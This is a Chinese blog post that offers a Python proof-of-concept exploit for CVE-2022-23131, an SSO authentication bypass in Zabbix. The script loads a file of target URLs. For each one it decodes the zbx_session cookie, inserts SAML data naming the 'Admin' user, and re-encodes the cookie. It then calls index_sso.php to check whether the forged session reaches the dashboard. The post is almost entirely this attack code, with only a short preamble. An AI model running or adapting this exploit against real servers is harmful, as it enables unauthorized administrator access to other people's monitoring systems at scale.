zabbix SSO漏洞CVE-2022-23131
NO.1 废话
前段时间看到的这个sso洞,就造个轮子练练手。本菜狗多年脚本小子,代码就凑活看了。
NO.2 POC
和gayhub其他poc一样,cookie获取没问题,sso认证有问题,多数环境测试sso不成功,太挑版本了。
import requests
import re
from bs4 import BeautifulSoup
import base64
import urllib.parse
import json
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import sys
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
headers = {
'Accept': 'application/json',
'User-agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Edg/97.0.1072.55'
}
name = "Admin"
def get_url(target_url):
with open(target_url, 'r') as f: #读取文件,循环取值
for target_url in f:
url = target_url.strip('\n') #删除末尾换行符,此处更适合用str.replace(“\n”,””):替换”\n”为空
try: #异常处理
reponse_get = requests.get(url=url,headers=headers,timeout=3,verify=False)
if reponse_get.status_code == 200 :
cookie = reponse_get.cookies["zbx_session"]
print("地址{}\n请求成功".format(url))
decode_cookie=base64.b64decode(urllib.parse.unquote(cookie))
str_cookie = str(decode_cookie,encoding='utf-8')
json_cookie = json.loads(str_cookie)
dic_data = dict(saml_data=dict(username_attribute=name),sessionid=json_cookie['sessionid'],sign=json_cookie['sign'])
json_data = json.dumps(dic_data)
encode_session = urllib.parse.quote(base64.b64encode(json_data.encode()))
zbx_session = "zbx_session:"+encode_session
print("\033[32mcookie:{}".format(zbx_session))
cookie_get = requests.get(url=url+"/index_sso.php",headers=headers,data=zbx_session,timeout=3,verify=False)
if "action=dashboard.view" in cookie_get.text:
print("\033[32m[❤️]请求成功,cookie可用:{}".format(zbx_session))
else:
print("\033[31m[☠️] sso认证失败,请自行测试。 \033[0m")
else:
print("请求失败")
#sys.exit(0)
except Exception as e:
print("\033[31m[☠️] 程序异常:{} \033[0m".format(e))
continue
if __name__ == '__main__':
target_url = str(input('请拖入检测列表:'))
get_url(target_url)
